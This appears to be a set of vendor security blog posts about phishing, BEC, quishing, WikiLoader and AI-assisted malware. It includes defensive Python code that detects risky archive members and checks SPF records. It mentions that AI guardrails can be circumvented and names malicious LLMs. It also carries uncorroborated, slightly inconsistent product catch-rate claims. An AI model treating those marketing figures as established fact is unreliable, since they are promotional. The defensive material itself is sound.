This campaign was focused on the higher education and transportation sectors and, like many malware distribution schemes, used search engine optimization (SEO) poisoning to get malicious websites to appear high in the search engine listings for key search terms targeting those sectors. The campaign claimed to offer a download of GlobalProtect and used a combination of cloned webpages and cloud-based git repositories to deliver a file – named GlobalProtect64.exe – purporting to be the VPN. The file delivered was a trojanized version of a share trading application that sideloaded a malicious DLL, which allowed the execution of shellcode that fetched Wikiloader from a remote server. On execution, the user was told that GlobalProtect could not be installed due to missing libraries.

This was a marked change from other campaigns that have distributed Wikiloader, which has previously been delivered via phishing emails. This is the first time that GlobalProtect has been spoofed to deliver Wikiloader. The change in tactics is believed to be due to a different initial access broker starting to use Wikiloader.

Threat Actors Increasingly Using Archive Files for Email Malware Distribution

One of the most common ways of delivering malware is via phishing emails with malicious attachments. For years, the most common method involved emailing Microsoft Office documents that contained malicious macros. If the files are opened and macros are allowed to run, a malware download will be triggered. A variety of file attachments are now used for malware delivery, including PDF files, which allow links, scripts and executable files to be incorporated into the files. To hide malicious files from email security solutions, they are often added to archive files.

According to a recent analysis by HP security researchers, 39% of malware deliveries came from archive files in Q2, 2024, up from 27% the previous quarter. The researchers noted that in addition to using the most popular and well-known archive formats such as .zip, .rar, and .7z, more obscure archive files are increasingly being used. The researchers identified around 50 different archive file formats in Q2. Threat actors are also moving away from documents and are instead favoring script languages such as VBScript and JavaScript for malware delivery, with the scripts hidden in encrypted archive files to evade email security defenses.

End users are less likely to identify obscure archive formats and script files as malicious, as security awareness training has tended to focus on malicious documents containing macros. Security awareness training programs should inform employees about the different file types that may be used for malware delivery and safeguards should be implemented to reduce the risk of malware downloads, such as advanced spam filter software and web filters for blocking malware downloads from the Internet.
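
The practical defender's lesson from the HP findings is that an attachment should be classified by its content rather than its file name, and that the members of an archive need the same scrutiny as the container. The Python example below is added to illustrate that; it is not code from HP, TitanHQ or any email filter. The archive signatures are the standard ones for each format; the risky-extension list, the sample ZIP (which carries only placeholder text, no real malware) and the file name `invoice.pdf` are constructed for the example.

```python
import io
import posixpath
import zipfile
from typing import Optional

# Standard file signatures (magic bytes) of common archive containers, all at offset 0.
ARCHIVE_SIGNATURES = {
    "zip":   (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08"),
    "rar":   (b"Rar!\x1a\x07\x00", b"Rar!\x1a\x07\x01\x00"),
    "7z":    (b"7z\xbc\xaf\x27\x1c",),
    "gzip":  (b"\x1f\x8b",),
    "bzip2": (b"BZh",),
    "xz":    (b"\xfd7zXZ\x00",),
    "cab":   (b"MSCF",),
}

# File extensions under which each container legitimately travels.
# OOXML documents, JARs and APKs are ZIP archives internally, so they are listed under "zip".
EXPECTED_EXTENSIONS = {
    "zip": {".zip", ".docx", ".xlsx", ".pptx", ".jar", ".apk"},
    "rar": {".rar"}, "7z": {".7z"}, "gzip": {".gz", ".tgz"},
    "bzip2": {".bz2"}, "xz": {".xz"}, "cab": {".cab"},
}

# Member types worth a closer look: scripts and executables that run when double-clicked.
RISKY_MEMBER_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta",
                           ".exe", ".scr", ".bat", ".cmd", ".ps1", ".lnk"}


def detect_container(data: bytes) -> Optional[str]:
    """Classify by content, so a renamed or double-extension file is still recognised."""
    for name, signatures in ARCHIVE_SIGNATURES.items():
        if any(data.startswith(sig) for sig in signatures):
            return name
    return None


def inspect_attachment(filename: str, data: bytes) -> dict:
    """Return the detected container and a list of findings a filter could act on."""
    container = detect_container(data)
    findings = []
    if container is None:
        return {"container": None, "findings": findings}
    ext = posixpath.splitext(filename.lower())[1]
    if ext not in EXPECTED_EXTENSIONS[container]:
        findings.append(f"extension {ext or '(none)'} does not match {container} content")
    if container == "zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    member_ext = posixpath.splitext(info.filename.lower())[1]
                    if member_ext in RISKY_MEMBER_EXTENSIONS:
                        findings.append(f"script/executable member: {info.filename}")
                    if info.flag_bits & 0x1:  # general-purpose bit 0: entry is encrypted
                        findings.append(f"encrypted member (cannot be scanned): {info.filename}")
                        continue
                    with zf.open(info) as member:   # peek at the member's own magic bytes
                        inner = detect_container(member.read(16))
                    if inner:
                        findings.append(f"nested {inner} archive: {info.filename}")
        except zipfile.BadZipFile:
            findings.append("ZIP signature present but archive does not parse")
    return {"container": container, "findings": findings}


def build_sample_attachment() -> bytes:
    """Constructed sample: a ZIP that will be mailed as 'invoice.pdf'. No real malware inside."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.js", "// placeholder text, constructed for this example\n")
        zf.writestr("inner.7z", b"7z\xbc\xaf\x27\x1c" + b"\x00" * 16)  # only the 7z header bytes
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_attachment("invoice.pdf", build_sample_attachment()))
```

Only ZIP members are opened here because the standard library ships a ZIP reader; the same member-level checks apply to RAR, 7z and the rarer formats with the appropriate parser. An encrypted member is reported rather than silently skipped, since "cannot scan" is itself the signal the HP analysis describes.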

Deepfakes Increasingly Used in Attacks on Businesses

Deepfakes are increasingly being used in attacks on businesses on both sides of the Atlantic, and they have proved highly effective in financial scams. According to a survey conducted by Medius, around half of UK and US businesses have been targeted with deepfake scams and around 43% have fallen victim to the scams. Deepfake scams use artificial intelligence to alter images, videos, and audio recordings, making it appear that respected or trusted individuals are requesting a certain action.

The individuals deepfaked in these scams include executives such as the CEO and CFO, as well as vendors/suppliers. For example, a deepfake of the CEO of a company was used in a video conference call with the company’s employees. In one of these scams, an Arup employee was tricked into making 5 fraudulent transfers to Hong Kong bank accounts before the scam was detected. These scams highlight the importance of covering deepfakes in security awareness training.

TitanHQ Solutions That Can Help Protect Your Business

TitanHQ has developed a range of cybersecurity solutions for businesses and managed service providers to help defend against increasingly sophisticated cyberattacks.

  • SpamTitan Email Security – An advanced AI-driven cloud-based anti-spam service with email sandboxing that has recently been shown to block 99.98% of phishing threats and 100% of malware in independent performance tests.
  • PhishTitan Microsoft 365 Phishing Protection – A next-generation anti-phishing and phishing remediation solution for Microsoft 365 environments that augments native M365 defenses and blocks threats that EOP and Defender miss.
  • WebTitan DNS Filter – A cloud-based DNS filtering and web security solution providing AI-driven threat protection with advanced web content controls for blocking malware delivery from the Internet and access to malicious websites.
  • SafeTitan Security Awareness Training – A comprehensive, affordable, and easy-to-use security awareness training and phishing simulation platform that delivers training in real time in response to security mistakes.

For more information on these solutions, give the TitanHQ sales team a call today. All TitanHQ solutions are available on a free trial and product demonstrations can be arranged on request.

Evidence Found Indicating Cybercriminals Are Using GenAI Tools for Malware Creation

Generative artificial intelligence (GenAI) services are already being leveraged by cybercriminals to create convincing phishing emails, and it appears that these tools are being used for the creation of malware. GenAI services are capable of writing code; however, guardrails have been implemented to prevent malicious uses of these tools, such as the creation of malware. If those guardrails can be circumvented, the creation of malware would no longer be limited to skilled malware developers. Lower-skilled cybercriminals could develop their own malware using GenAI services, and there is growing evidence they are doing just that.

Over the summer, HP security researchers identified an email campaign targeting French users. The phishing email used HTML smuggling (encrypted HTML) to evade detection, and on analysis, the campaign delivered malicious VBScript and JavaScript code that appeared to have been created using GenAI tools. The malicious code was commented throughout, describing what each function does, which is rare in malware development as the exact workings of the code tend not to be described. The comments, along with the use of native-language function and variable names, all suggest that GenAI was used to create the malware.

The code was used to deliver AsyncRAT malware, a widely available, open source information stealer capable of recording the victim’s screen and logging keystrokes. The malware also acts as a malware downloader that can deliver other malware payloads, including ransomware. Little technical skill was required for this campaign: HTML smuggling does not require any programming and the malware being delivered is widely available, while the fact that the comments had not been removed and there was no obfuscation points to development by an inexperienced cybercriminal.

There have been other examples of apparent malicious code creation using GenAI, such as a malicious PowerShell script identified earlier this year that was also used to deploy infostealer malware. That campaign targeted users in Germany and impersonated Metro cash-and-carry and was also delivered via email. Just as GenAI tools are helping writers rapidly create written content, GenAI tools can be used to rapidly develop malicious code. ChatGPT and Gemini have guardrails in place that it may be possible to circumvent, but there are many dark LLMs that lack those controls such as WormGPT and FraudGPT. If these tools are leveraged, relatively low-skilled cybercriminals can develop their own malware variants.

Traditional antivirus solutions use signature-based detection. When malware is identified, a signature is added to the antivirus solution for that specific malware variant that allows it to be detected in the future. There is a delay between the creation of malware and the addition of malware signatures to the definition lists of antivirus solutions, during which time malware can easily be smuggled onto devices undetected. If the creation of malware can be accelerated with GenAI tools, cybercriminals will have the upper hand.

The solution for businesses is to deploy security solutions capable of detecting novel malware variants by their behavior rather than a signature. Since malware is commonly delivered via email, having a cloud-based email security solution that incorporates behavioral analysis of attachments will help identify and neutralize these malware variants before they can be installed.

SpamTitan from TitanHQ is a cloud-based antispam software that incorporates email sandboxing. When standard antivirus checks are passed, suspicious emails and attachments are sent to a next-generation email sandbox for deep inspection, where the behavior of the attachments is assessed in an isolated sandbox environment. If malicious actions are detected, the threat is neutralized. SpamTitan also incorporates AI-based and machine-learning detection mechanisms to assist with malicious email detection, which, along with a host of other checks, ensure malicious emails are detected and blocked. In recent independent tests, SpamTitan had a 99.99% phishing catch rate and a 100% malware catch rate, with zero false positives.

SpamTitan, like all other TitanHQ cybersecurity solutions, is available on a free trial to allow you to see for yourself the difference it makes. To find out more about protecting your business from increasingly sophisticated threats, give the TitanHQ team a call.

Compromised Credentials and Phishing Most Commonly Used to Access Business Networks

Cybercriminals and nation state threat actors are targeting businesses to steal sensitive information, often also using file encryption with ransomware for extortion. Initial access to business networks is gained through a range of tactics, but the most common is the use of compromised credentials. Credentials can be guessed using brute force tactics, by exploiting password reuse in credential stuffing attacks, using malware such as keyloggers to steal passwords, or via phishing attacks.

According to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), compromised credentials are the most common method for initial access in attacks on critical infrastructure entities. CISA revealed that 41% of all attacks on critical infrastructure used compromised credentials and phishing and spear phishing were identified as the second most common attack vector. A separate study by Osterman Research and OPSWAT revealed that the majority of critical infrastructure entities have suffered an email security breach in the past 12 months, with 75% of critical threats arriving via email.

Should any of these email threats arrive in inboxes, they could be opened by employees resulting in the theft of their credentials or the installation of malware. Both could provide a threat actor with the access they need to steal sensitive data and encrypt files with ransomware. Email threats usually impersonate a trusted entity such as a vendor, well-known organization, colleague, or previous acquaintance, which helps to make the correspondence appear authentic, increasing the likelihood of an employee responding.

According to CISA, the success rate of these emails depends on the technical defenses a business has in place and whether security awareness training has been provided to the workforce. The primary defense against phishing and other email attacks is a spam filter, which can be a cloud-based spam filtering service or gateway spam filter. CISA recommends implementing email filtering mechanisms incorporating Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM), as both are important for protecting against spoofing and email modification.
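
To make the SPF recommendation concrete, the Python example below is added here as an illustration of how a receiving mail server evaluates a domain's SPF record against the connecting IP. It is not code from CISA, TitanHQ or any mail server, and it is deliberately simplified: DNS is replaced by a constructed in-memory zone (`CONSTRUCTED_ZONE`, using documentation addresses only), only the `ip4`, `ip6`, `include` and `all` terms are evaluated, and the `a`, `mx`, `ptr`, `exists` and `redirect` terms, which need live DNS, are reported as unsupported.

```python
import ipaddress
from typing import Dict, List, Optional

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_DNS_LOOKUPS = 10  # RFC 7208 section 4.6.4 limit on DNS-querying mechanisms per check

# Constructed stand-in for DNS TXT lookups; documentation names and address ranges only.
CONSTRUCTED_ZONE: Dict[str, str] = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailer.example -all",
    "_spf.mailer.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
}


def check_host(ip: str, domain: str, zone: Dict[str, str] = CONSTRUCTED_ZONE,
               _lookups: Optional[List[int]] = None) -> str:
    """Evaluate the SPF record of `domain` for a connection from `ip`.

    Returns one of pass / fail / softfail / neutral / none / permerror, in the
    sense of RFC 7208. `_lookups` carries the shared lookup counter through includes.
    """
    lookups = _lookups if _lookups is not None else [0]
    record = zone.get(domain)
    if record is None:
        return "none"
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    sender = ipaddress.ip_address(ip)
    for term in terms[1:]:
        qualifier = "+"                      # an unqualified mechanism means "+" (pass)
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            return QUALIFIERS[qualifier]     # catch-all; whatever follows is ignored
        if name in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)   # bare address means /32 or /128
            except ValueError:
                return "permerror"
            if sender.version == net.version and sender in net:
                return QUALIFIERS[qualifier]
        elif name == "include":
            lookups[0] += 1
            if lookups[0] > MAX_DNS_LOOKUPS:
                return "permerror"
            inner = check_host(ip, arg, zone, lookups)
            if inner == "pass":              # include "matches" only on an inner pass;
                return QUALIFIERS[qualifier]  # an inner fail/softfail/neutral just means no match
            if inner in ("none", "permerror"):
                return "permerror"
        else:
            # a, mx, ptr, exists and redirect= need live DNS; this offline example does not
            # guess at them (simplification for the example, not RFC behaviour).
            return "permerror"
    return "neutral"  # RFC 7208: no mechanism matched and there was no "all"


if __name__ == "__main__":
    for probe in ("192.0.2.5", "198.51.100.10", "2001:db8::1", "203.0.113.9"):
        print(probe, "->", check_host(probe, "example.com"))
```

Two things the code makes visible that the prose does not: an `include` whose own record ends in `~all` does not soften the parent's `-all` (only an inner pass counts), and SPF authorises the envelope sender (MAIL FROM or HELO identity), not the header `From:` the user sees. Closing that gap is what DMARC's alignment check is for, which is why SPF and DKIM are typically deployed together with a DMARC policy.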

Antiphishing defenses should rewrite URLs to show their true destination, and for maximum protection – especially against AI-generated phishing attempts – anti-spam software should incorporate machine learning and AI-based detection mechanisms and analyze email content to determine how emails deviate from the typical emails received by a business. Malware is often used in attacks, so spam filters should incorporate antivirus protection, including email sandboxing to detect malware based on its behavior rather than its signature, since many novel threats can bypass the signature-based defenses of standard anti-virus products.

A web filter is a useful tool for protecting against the web-based component of phishing attempts, as it can block access to known malicious websites and also prevent visits to malicious websites from general web browsing. Security awareness training should be provided frequently to the workforce to improve human-based defenses and reduce the risk of employees being tricked by social engineering and phishing attempts. Employees should also be provided with an easy way of reporting suspicious requests to their security teams. Backing up security awareness training with phishing simulations can help reinforce training and identify knowledge gaps.

To protect against compromised credentials, multifactor authentication should be implemented, with phishing-resistant MFA providing the highest level of protection. Password policies should be implemented that require the use of unique, strong passwords, all default passwords should be changed, and any inactive or unnecessary accounts should be disabled.

TitanHQ can help protect against these attacks through a suite of cybersecurity solutions: SpamTitan Email Security, the WebTitan DNS-based web filter, the PhishTitan anti-phishing solution for Microsoft 365, and the SafeTitan security awareness training platform. All solutions have been developed to be easy for businesses to implement and use and provide cutting-edge protection against the full range of cyber threats. For more information, give the TitanHQ team a call and take the first steps towards improving your defenses against increasingly sophisticated cyber threats.

Novel QR Code Phishing Campaign Steals M365 Credentials via Microsoft Sway

QR codes are used for a wide range of purposes, including marketing, communications, and even in restaurants to direct diners to menus, and with the popularity of QR codes soaring it should be no surprise that they are being used by cybercriminals in their phishing campaigns. QR codes are similar to the bar codes on products. They are black and white images that contain information, which for QR codes is commonly a URL for a web page or hosted file. A camera on a smartphone is used to scan the code, which will detect the URL, and the user can click that URL to visit the resource. It is far more convenient than entering a URL on a mobile phone keypad.

The use of QR codes has been growing considerably. According to a 2024 report from QR Tiger on QR Code trends, there has been 47% year-over-year growth in QR code usage. The convenience of QR codes and their growing popularity have not been lost on cybercriminals who are using QR codes to direct unsuspecting users to malicious websites that host malware or are used to phish for credentials. As an added advantage, many traditional security solutions are unable to assess the URLs in QR codes and fail to block access to malicious sites.

QR code phishing (aka quishing) may involve QR codes sent via email. Instead of embedding a hyperlink in an email, a QR code is used to evade email security solutions. A novel campaign has recently been detected by security researchers at Netskope Threat Labs that uses QR codes to steal Microsoft 365 credentials. In this campaign, a Microsoft 365 product called Microsoft Sway is abused to host the spoofed web pages.

Microsoft Sway is used for creating newsletters and presentations and was first released by Microsoft under the M365 product suite in 2015. Since Microsoft Sway is a legitimate Microsoft cloud-based tool, a link to a Sway presentation is unlikely to be identified as malicious by security solutions, as Sway is a trusted platform. The link to the Sway presentation may be distributed in emails, SMS messages, and instant messenger platforms, or can be added to websites in an iframe. A QR code could even be used to direct a user to the Sway presentation.

That presentation includes a QR code that encodes a URL for a website that masquerades as a legitimate Microsoft site. If scanned, the user is directed to a web page where they are asked to enter their Microsoft 365 credentials. What makes this campaign even harder for users to identify is the transparent phishing technique used. Entering credentials will log the user into the legitimate site, and at the same time credentials are captured along with any MFA code, which are relayed to the attacker. The credentials and MFA code are then used to hijack the account.

TitanHQ offers several cybersecurity solutions that provide layered protection against advanced phishing attempts, including quishing. Since these scams target individuals, it is important to raise awareness of the threat by providing security awareness training to the workforce. The SafeTitan platform from TitanHQ includes a wealth of training content, including modules for raising awareness of quishing. The platform also includes a phishing simulator with quishing templates to test whether employees scan QR codes and visit the websites they encode.

Regardless of how a URL is communicated to a member of the workforce, it is possible to block access to a malicious URL with a DNS filter. TitanHQ’s DNS filter, WebTitan, blocks access to all known malicious websites and is constantly updated with the latest threat intelligence from a global network of users. As soon as a malicious URL is detected, the solution is updated and all WebTitan users are protected. QR codes may direct users to websites where malware is downloaded; WebTitan can be configured to block file downloads from the internet by file type.

QR codes are commonly sent via email, so an advanced email security solution is required. SpamTitan is a cutting-edge spam filtering service that uses advanced detection techniques, including AI and natural language processing to identify and block these threats, even zero-minute phishing attempts. In contrast to many spam filters for incoming mail, SpamTitan can detect novel phishing and quishing attempts. Finally, businesses can add another layer of protection through PhishTitan, TitanHQ’s advanced anti-phishing solution for Microsoft 365 which blocks attempts to visit phishing sites and allows security teams to easily remediate phishing attempts across their entire email system.

Phishers are constantly developing new tactics and techniques for distributing malware and stealing credentials, but with TitanHQ solutions in place, you will be well protected against these rapidly evolving threats. Talk with TitanHQ’s cybersecurity experts today for more information on staying one step ahead of cybercriminals and keeping your company safe.

Is Your Business Protected Against Internal Phishing Attempts?

If a phishing attempt is successful and a threat actor gains access to an employee’s email account, it is common for the compromised email account to be used for internal phishing. Some malware variants also allow threat actors to hijack email accounts and send malware internally, adding a copy of the malware to a message thread to make it appear that a file was attached in response to a past email conversation.

These attacks occur in several different scenarios: business email compromise attacks, where the attacker needs an account that can be used for the scam – a CEO, executive, HR, or IT department account, for example; distributing malware extensively to compromise as many accounts as possible; gaining access to multiple email accounts; or compromising multiple accounts to gain access to sensitive data.

In industries where data breach reporting is mandatory, such as in healthcare in the United States, email account breaches are regularly reported where unauthorized activity is detected in a single email account, and the subsequent investigation reveals multiple employee email accounts have been compromised through internal phishing.

Internal phishing attempts are much harder to identify than phishing attempts from external email accounts. Even when email security solutions incorporate outbound scanning, these phishing attempts are often not recognized as malicious as the emails are sent from a trusted account. The recipients of these emails are also much more likely to trust an internal email than an external email from an unknown sender and open the email, click a link, or open a shared file.

Attackers may also spoof an internal email account. It is easy to find out the format used by a company for their emails, and names can be found on professional networking sites. A good email security solution should be able to identify these spoofed emails, but if they arrive in an inbox, an employee may be fooled into thinking that the email is a genuine internal email.

It is important for businesses to take steps to combat internal phishing as it is a common weak point in email defenses. Unfortunately, there is no single technical control that can protect against these phishing attempts. What is required is a combination of measures to provide layered protection. With layered security, if one measure fails to protect against a threat, others are in place to thwart the attempt.

The best place to start is with a technical measure to identify and block these phishing threats. Spam filter software naturally needs to have inbound as well as outbound scanning; however, standard checks such as reputation scans are not enough. An email security solution should have AI and machine learning capabilities for assessing how emails deviate from standard emails sent internally and for in-depth analysis of message content. Link scanning is also important, with URL rewriting to identify the true destination of embedded URLs, OLE detection, and email sandboxing to identify malicious attachments – not just malware but also malicious links in email attachments.

Security awareness training is vital as employees may not be aware of threats they are likely to encounter. Security awareness training should include internal phishing and employees should be made aware that they should not automatically trust internal emails as they may not be what they seem. Security awareness training should be accompanied by phishing simulations, including simulated phishing attempts from internal email accounts. These will give employees practice in identifying phishing and security teams will learn how susceptible the workforce is and can then take steps to address the problem.

Multi-factor authentication is required. If a phishing attempt is not identified by either a security solution or the employee, and the employee responds and divulges their credentials, they can be used by the threat actor to access the employee’s email account. Multi-factor authentication protects against this by requiring another factor – in addition to a password – to be provided. The most robust form of MFA is phishing-resistant MFA, although any form of MFA is better than none.

TitanHQ can help protect against phishing attacks of all types through the SpamTitan cloud-based spam filtering service, the PhishTitan anti-phishing solution for M365, and the SafeTitan Security awareness training and phishing simulation platform.

The engine that powers SpamTitan and PhishTitan has an exceptional phishing catch rate, including for internal phishing attempts. The engine incorporates AI and machine learning algorithms that can detect novel phishing attempts and emails that deviate from the normal emails sent internally, as well as OLE detection, URL rewriting, and email sandboxing for catching novel malware and phishing threats.

The SafeTitan Security awareness training platform includes an extensive library of training content to teach security best practices, eradicate risky behaviors, and train employees on how to recognize an extensive range of threats. The phishing simulator makes it easy to conduct internal phishing tests on employees to test knowledge and give employees practice at identifying email threats. Usage data shows the platform can reduce employee susceptibility to phishing attempts by up to 80%.

For more information about improving your phishing defenses, speak with TitanHQ today.

AI Tools Increasingly Used for BEC/VEC Attacks

Business email compromise (BEC) and vendor email compromise (VEC) attacks can result in huge financial losses that can prove catastrophic for businesses, and these attacks are being conducted with increasing regularity.

BEC and VEC attacks have their roots in phishing and often involve phishing as the first stage of the attack. These attacks involve impersonation of a trusted person through spoofed or compromised email accounts. The attacker then tricks the targeted individual into disclosing sensitive information or making a fraudulent wire transfer. In the case of the latter, the losses can be considerable. A scam targeting a company employee at Orion, a Luxembourg carbon black supplier, resulted in fraudulent transfers of $60 million. The employee was tricked into believing he was conversing with a trusted vendor and made multiple fraudulent transfers to the attacker’s account.

BEC and VEC attacks are among the most difficult email threats to detect, as they often use legitimate, trusted email accounts so the recipient of the email is unaware that they are conversing with a scammer. Since the attacker often has access to emails, they will be aware of confidential information that no other individual other than the genuine account holder should know. The attacker can also check past emails between the account holder and the victim and can mimic the writing style of the account holder. These attacks can be almost impossible for humans to distinguish from genuine communications. Scammers often reply to existing email threads, which makes these scams even more believable.

BEC/VEC scammers are increasingly turning to AI tools to improve their attacks and AI tools make these scams even harder for humans and email security solutions to identify. AI tools can be fed past emails between two individuals and told to create a new email by mimicking the writing style, resulting in perfect emails that could fool even the most security-aware individual.

Some of the most convincing VEC attacks involve the use of compromised email accounts. The attacker gains access to the account through phishing or stolen credentials and searches through the account for information of interest that can be used in the scam. By searching through sent and stored emails, they can identify the vendor’s clients and identify targets. They are then sent payment requests for fake invoices, or requests are made to change the bank account information for genuine upcoming payments.

Due to the difficulty of identifying these threats, a variety of measures should be implemented to improve defenses, including administrative and technical controls, as well as employee training. In order to beat AI tools, network defenders need to adopt AI themselves, and should implement a spam filter with AI and machine learning capabilities, such as the SpamTitan cloud-based spam filtering service.

SpamTitan analyzes the genuine emails received by the company to create a baseline against which other emails can be measured. Through machine learning, Bayesian analysis, and other content checks, SpamTitan is able to identify the signs of BEC/VEC and alert end users when emails deviate from the norm. An anti-phishing solution is also strongly recommended to protect accounts against initial compromise and to raise awareness of potential threats. PhishTitan from TitanHQ incorporates cutting-edge threat detection with email banners warning about external emails and other threats and allows IT teams to rapidly remediate any attacks in progress.

Security awareness training is essential for raising awareness of the threat of BEC and VEC attacks. Since these scams target executives, IT, and HR staff, training for those users is vital. They should be made aware of the threat, taught how to identify these scams, and the actions to take when a potentially malicious message is received. With the SafeTitan security awareness training program it is easy to create training courses and tailor the content to cover threats each user group is likely to encounter to ensure the training is laser-focused on the most pertinent threats.

While spam email filtering and security awareness training are the most important measures to implement, it is also important to strengthen defenses against phishing through the adoption of multi-factor authentication on all email accounts, to prevent initial compromise. Administrative controls should also be considered, such as requiring employees to verify any high-risk actions, such as changes to bank accounts or payment methods, and maintaining a contact list of verified contact information to allow phone verification of any high-risk change. This two-step verification method can protect against all BEC/VEC attacks and prevent fraudulent payments.

Increasingly Advanced Phishing Campaigns Being Launched by Russia

Russian threat actors have been conducting increasingly advanced phishing campaigns against media organizations, international NGOs, and other targets perceived as being a threat to Russia. According to a recent report from Access Now and Citizen Lab, several international NGOs have reported being targeted with spear phishing emails in a campaign that has been ongoing since the start of 2023.

The campaign has been attributed to a threat actor known as COLDRIVER (aka Star Blizzard, Calisto), which multiple governments have attributed to the Russian Federal Security Service (FSB). Another campaign has been conducted by a second, relatively new threat group known as COLDWASTREL, whose interests align with those of COLDRIVER.

The campaigns aim to steal credentials rather than infect devices with malware. Spear phishing emails are used to make initial contact and trick the targets into disclosing their credentials. The emails sent to individuals are highly personalized to maximize the probability of the recipient responding. A common theme was to make initial contact by masquerading as a person known to the target, including colleagues, funders, and U.S. government employees.

One of the common lures used in the emails was to request that the recipient review a document relevant to their work, which for media companies was often a draft article. In some of the emails, the document that the target was requested to view was not attached to the email. The failure to attach the file is likely a tactic used by the threat actor to see if the recipient responds and to only provide the file if they do. That could help to ensure that only the intended recipient is presented with the malicious file, reducing the risk of detection.

The file is often a PDF file which, if opened, only displays blurred text. The target is told that the text has been encrypted using an online service, e.g. ProtonDrive. In order to view the document, the recipient is required to click a link. If the link is clicked, JavaScript code is fetched from the attacker’s server which fingerprints the system. If the target is deemed to be of interest, they are directed to a URL with a CAPTCHA check that must be passed, which prevents bots from landing on the destination URL.

The landing page presents the user with a login prompt relevant to their email service, such as Gmail or ProtonMail, which may be pre-populated with the user’s email address so they are only required to enter their password and multifactor authentication code. If they are entered, the threat actor will obtain a session cookie that will allow them to access the account for some time before they are required to reauthenticate, allowing them to immediately access sensitive information in the target’s email account and associated online storage, such as Google Drive. The domains used for these campaigns did not remain operational for more than 30 days and they were registered with Hostinger, which rotates the IP addresses for the domains every 24 hours in an effort to prevent the sites being blocked by security solutions.

The targets of the campaign who spoke with the researchers chose to remain anonymous. They included Russian opposition figures in exile, NGO staff members in the US and Europe, funders, and media organizations. The researchers suggest that the campaign may have been conducted more broadly on other targets that are perceived threats to Russia. The researchers said a common theme among the targets was that they had extensive networks among sensitive communities and links to Russia, Ukraine, and Belarus.

Spear phishing campaigns can be highly effective as they are hyper-focused on small numbers of individuals and usually involve extensive research before initial contact to ensure that the right person is impersonated and a lure is used that the target is likely to respond to. Various measures are also used to reduce the chance of detection, including avoiding sending malicious content in the initial email, the use of CAPTCHA checks, and rotating IP addresses. Standard email security solutions may fail to detect these threats, which means it is often down to the individuals to identify and avoid these threats. The consequences of failing to do so can be severe, especially for the targeted individuals in this campaign who could be subjected to physical harm or arrest and imprisonment.

Spear phishing is also used by cybercriminals in their campaigns, and while these attacks are typically financially motivated, they can cause significant harm to businesses. Similar tactics are used and the campaigns can be highly effective. To block spear phishing and other sophisticated phishing attacks, businesses need to have advanced email security measures that include email sandboxing and machine learning algorithms to identify potentially malicious emails, since standard checks of the sender’s reputation, embedded URLs, and malware scans are unlikely to identify anything suspicious. This is an area where TitanHQ can help. Give the team a call to find out more about protecting against advanced phishing and malware threats.

$60 Million Lost in Single Business Email Compromise Scam

Business Email Compromise (BEC) has long been one of the costliest types of cybercrime. According to the latest data from the Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3), almost 21,500 complaints were received about BEC attacks in 2023 resulting in adjusted losses of more than $2.9 billion. Between October 2013 and December 202, more than $50 billion was lost to BEC scams domestically and internationally.

What is Business Email Compromise?

BEC, also known as email account compromise (EAC), is a sophisticated scam that involves sending emails to individuals that appear to have come from a trusted source and making a legitimate-sounding request, which is typically a change to bank account details for an upcoming payment or payment of a fake invoice.

One such scam targets homebuyers, with the attacker impersonating the title company and sending details for a wire transfer for a down payment for a house purchase. Businesses are commonly targeted and asked to wire money for an upcoming payment to a different bank account. While the scammer is usually based overseas, the bank account may be at a bank in the victim’s home country. When the funds are transferred by the victim they are immediately transferred overseas or withdrawn, making it difficult for the funds to be recovered.

BEC attacks often start with phishing emails. The scammers use phishing to gain access to an employee’s email account, then the account is used to send phishing emails internally. The goal is to compromise the account of an executive such as the CEO or CFO. That account can then be used for the BEC part of the scam. Alternatively, vendors are targeted, such as construction companies, and their accounts are used for BEC attacks on their customers.

Once a suitable email account has been compromised, the scammers search through previous emails in the account to find potential targets – the company’s customers in the case of a vendor account or individuals responsible for making wire transfers in the case of a CEO’s account. The attackers study previous communications between individuals to learn the writing style of the account holder, and then craft their messages impersonating the genuine account owner. AI tools may also be used for this part of the scam or even researching targets. Alternatively, email accounts and websites may be spoofed, using slight variations of legitimate email addresses and domains. The information needed to conduct the scam may be gleaned from public sources or stolen via malware infections.

From here, a single request may be sent or a conversation may ensue over several emails to build trust before the request is made. Considerable time and effort is put into these scams because the effort is worth it for the scammers. The losses to these scams can be huge. Fraudulent wire transfers are often for tens of thousands of dollars or more, and with two recent scams, the losses have been immense.

Tens of Millions Fraudulently Obtained in BEC Scams

INTERPOL recently reported that it had successfully recovered more than $40 million stolen in a single BEC attack. The scammers targeted a commodities firm in Singapore, impersonating one of the company’s suppliers. In July, an email was received that had apparently been sent by the supplier requesting a pending payment be sent to a new bank account, in this case, the account was based in Timor Leste. In this scam, the email was sent from an account that differed slightly from the supplier’s legitimate email address. That difference was not identified and the bank account details were changed. A payment of $42.3 million was made to the account, and the transfer was only determined to be fraudulent when the supplier queried why the payment had not been received. INTERPOL was able to assist with the recovery of $39 million, and seven arrests were made which also involved the recovery of a further $2 million.

There has since been an even bigger scam and the victim was not so fortunate. The chemical manufacturing company Orion reported falling victim to a BEC attack that resulted in a $60 million loss. The Luxembourg firm told the U.S. Securities and Exchange Commission (SEC) that a non-executive employee was tricked into transferring the funds to multiple third-party accounts. So far, that loss has not been recovered.

How to Reduce Risk And Defeat BEC Attacks

